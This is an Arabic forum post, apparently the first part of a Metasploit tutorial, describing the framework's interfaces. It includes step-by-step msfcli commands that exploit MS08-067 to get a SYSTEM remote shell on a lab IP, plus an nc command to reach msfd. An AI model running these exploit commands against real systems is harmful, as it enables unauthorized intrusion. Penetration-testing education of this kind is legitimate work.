|
![]() |
|
أدوات الموضوع | انواع عرض الموضوع |
![]() |
#1 | |||||||
Creator
![]() ![]()
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
|
![]()
msfconsole: [hide]سطر أوامر مشروع ميتاسبلويت ويمكننا اعتباره الواجهة الرئيسية للمشروع, يوفر لنا سطر أوامر المشروع تحكم كامل في ميتاسبلويت, الثغرات وجميع الأدوات الموجودة بالمشروع ونستطيع من خلاله الوصول لجميع البرامج الموجودة في الجهاز كما أنه يحتوي على نفس خصائص سطر أوامر نظام لينوكس مثل دعم الاكمال التلقائي بالضغط على زر Tab ويمكننا عند استخدامه تحديد المتغيرات التي نريدها مسبقا لنتمكن من استغلال الثغرات بشكل سريع والعديد من الأمور الأخرى (شخصيا أجد أن سطر الأوامر هو الطريقة الأنسب للتعامل مع المشروع وستلاحظون ذلك أثناء استخدامه في الشرح)[/hide]. msfcli: واجهة أخرى تعمل من سطر الأوامر لكنها تختلف عن msfconsole بأنها ليست تفاعلية (Interactive) أي أننا لن نحتاج للدخول الى سطر أوامر المشروع وتنفيذ عدة أوامر لاستغلال الثغرة بل نستطيع القيام بذلك بتنفيذ أمر واحد فقط بعد تحديد الخيارات التي نريدها بشكل صحيح وهذا يفيدنا في استخدام المشروع من خلال Bash Script أو أي برنامج آخر, نفذ الأمر: كود: ./msfcli لاستعراض الخيارات التي يوفرها msfcli ولاستعراض جميع الثغرات/الأدوات المساعدة الموجودة في مشروع ميتاسبلويت كما هو ظاهر في الصورة التالية: ****sploit-3 حسنا كون msfcli ليست واجهة غير تفعالية هذا يعني أننا نستطيع التعامل مع المشروع واستغلال الثغرات باستخدام أمر واحد فقط! كذلك يمكننا استخدامها مع برامج أخرى, لنفرض أننا نريد استغلال الثغرة MS08-67 في البداية نتأكد من وجودها في المشروع باستخدام الأمر: كود: ./msfcli | grep "ms08_067" ليظهر لنا اسم الثغرة التي نريد استغلالها “exploit/windows/smb/ms08_067_netapi” ننفذ الأمر: كود: ./msfcli exploit/windows/smb/ms08_067_netapi S ليتم عرض معلومات عن الثغرة كما هو واضح في الصورة التالية: لاظهار خيارات الثغرة, نستخدم الأمر: كود: ./msfcli exploit/windows/smb/ms08_067_netapi O أما لاظهار الخيارات المتقدمة نستخدم الأمر: كود: ./msfcli exploit/windows/smb/ms08_067_netapi A بالنسبة لي سأبقي الخيارات الافتراضية كما هي مع تحديد قيمة RHOST فقط وأنفذ الأمر: كود: ./msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.2.128 P لاستعراض الـ Payloads التي توفرها هذه الثغرة: لنفرض أننا اخترنا أبسط استغلال “windows/shell/bind_tcp” ونريد اختراق الجهاز 192.168.2.128 اذا كل ما علينا هو تنفيذ الأمر: كود: ./msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.2.128 PAYLOAD=windows/shell/bind_tcp O بالنسبة لي سأغير المنفذ الافتراضي الذي سيتم فتحه بالجهاز الى 2222 لذلك نحدد قيمة LPORT ولا ننسى تحديد RHOST مرة أخرى أيضا ليصبح الاستغلال النهائي بهذا الشكل: كود: ./msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/shell/bind_tcp RHOST=192.168.2.128 LPORT=2222 E لاحظ أننا أضفنا الى نهاية الأمر E ليتم تشغيل الاستغلال: كما تلاحظون تمكّنا من اختراق الجهاز والحصول على remote Shell بصلاحيات SYSTEM بتنفيذ أمر واحد فقط!!! << مين فيكم يستخدم ويندوز؟ ومن مازال يعيش في عصر عنترة بن شداد ويفكر بالاختراق باستخدام باتش أو استغلال ثغرة في IE!!؟ msfgui: الواجهة الرسومية من مشروع ميتاسبلويت, تمت برمجتها باستخدام مكتبة GTK ولغة Ruby لذلك احتجنا لوجود الحزم ruby-gtk2 , ruby-libglade2 منصبة في التوزيعة التي نستخدمها, نستطيع عن طريق هذه الواجهة عمل كل شيء والتحكم الكامل في المشروع فهي تحتوي على سطر أوامر المشروع مدمج بداخلها كما أنها تقوم بتصنيف الثغرات والـ Modules الموجودة في المشروع بطريقة جميلة وبسيطة وكل ماعلينا هو النقر مرتين على الثغرة التي نريد لتظهر لنا نافذة تطلب منا الخيارات لتنفيذ الثغرة, كما تحتوي الواجهة على نافذتين الأولى تظهر لنا الثغرات التي تعمل Jobs والأخرى تظهر لنا الاستغلالات الناجحة التي حصلنا عليها Sessions, يتم تشغيلها بتنفيذ الأمر: كود: ./msfgui msfweb: هذه الواجهة تعمل عن طريق المتصفح بالاعتماد على مشروع Ruby On Rails وتعتبر هذه الواجهة الأساسية في نظام ويندوز, يمكننا تشغيل msfweb باستخدام الأمر: كود: ./msfweb بعد ذلك كل ماعلينا هو فتح المتصفح على الرابط: كود: http://127.0.0.1:55555 لتظهر لنا الواجهة كما هو واضح في الصور التالية: يجب علينا الحذر عند استخدام هذه الواجهة داخل الشبكة لأنها لا تحتوي على نظام تسجيل [hide]دخول أو أي نظام حماية مما يمكن الأشخاص الموجودين في الشبكة من استخدام المشروع وهذا قد يعرض جهازك للاختراق! اذا أردت استخدام هذه الواجهة يجب اعداد الجدار الناري بطريقة صحيحة لتمنع الآخرين من الاتصال بجهازك عن طريق المنفذ[/hide] 55555. msfd: تقوم بتشغيل مشروع ****sploit كخدمة في الجهاز وتمكننا من استخدامه عن بعد باستخدام الأداة Netcat أو Telnet مثلا, الجميل في msfd أنها تمكن أكثر من شخص من استخدام نفس المشروع كما أنها تسمح لهم بمشاركة العمليات والـ Sessions فيما بينهم. نفّذ الأمر: كود: ./msfd -h لاستعراض الخيارات: نستخدم a لتحديد أيبي الجهاز الذي ستعمل عليه الخدمة ونستخدم p لتحديد المنفذ الذي نريد عوضا عن المنفذ الافتراضي 55554, مثلا: كود: ./msfd -a 192.168.2.1 -p 55442 [hide]الآن أي شخص يستطيع استخدام مشروع ميتاسبلويت عن بعد باستخدام أداة[/hide] Netcat أو Telent وذلك بتنفيذ الأمر: كود: nc 192.168.2.1 55442 [hide]لاحظ أن هذه الخدمة أيضا لاتحتوي على نظام حماية أو تسجيل دخول وهذا يمكن أي شخص موجود داخل الشبكة من الاتصال بالجهاز الذي يعمل عليه[/hide] msfd والتحكم بالجهاز بشكل كامل! إلى هنا نكون انهينا الجزء الأول بفضل الله ، وتابعونا في الجزء الثاني ان شاء الله حيث سنتناول الإستغلالات المتقدمة في مشروع الميتاسبلويت ودمتم سالمين المصدر: development-point - للمزيد تابع : قسم توزيعات أختبار الأخترآق المتقدم 'vr hgYsjo]hl hgljr]l glav,u hgldjhsfg,dj hg[.x ( 1 )
|
|||||||
![]() |
![]() |
مواقع النشر (المفضلة) |
الكلمات الدلالية (Tags) |
لمشروع, المتقدم, الميتاسبلويت, الجزء, الإستخدام |
![]() |
|
الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1) | |
|
|
![]() |
||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
[ شرح مفصل ] ما هو الميتاسبلويت ؟ | Ethical Hacker | قسم توزيعات أختبار الأخترآق المتقدم | 2 | 03-09-2014 04:37 PM |
مبدأ عمل الميتاسبلويت ! | Ethical Hacker | قسم توزيعات أختبار الأخترآق المتقدم | 5 | 06-09-2013 10:46 PM |
الدخول الى البرنامج ( الميتاسبلويت) | ,я_ρяσχу' | حلول و مشاكل توزيعات أختبار الأخترآق | 6 | 11-15-2012 03:18 PM |
مبدأ عمل الميتاسبلويت ! | windows 8 | الأرشيف | 0 | 11-12-2012 05:32 PM |
[ شرح ] [ شرح مفصل ] ما هو الميتاسبلويت ؟ | windows 8 | حلول و مشاكل توزيعات أختبار الأخترآق | 0 | 11-11-2012 10:20 PM |